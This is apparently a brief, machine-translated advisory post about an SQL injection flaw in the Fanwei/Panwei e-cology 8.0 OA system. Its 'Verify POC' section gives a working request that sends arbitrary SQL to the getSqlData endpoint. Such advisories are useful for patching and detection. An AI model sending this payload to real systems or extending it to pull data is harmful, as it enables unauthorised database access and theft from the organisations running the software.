Panwei Oa E Cology Getsqldata Sql Injection Vulnerability
Panwei Oa E Cology Getsqldata Sql Injection Vulnerability
Panwei OA E-Cology getSqlData SQL injection vulnerability
Vulnerability Description
Fanwei e-cology is an OA office system specially made for large and medium-sized enterprises, and supports PC, mobile and WeChat offices to work simultaneously. Panwei e-cology has SQL injection vulnerability.
Vulnerability Impact
Fanwei e-cology 8.0
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version
This post is licensed under CC BY 4.0 by the author.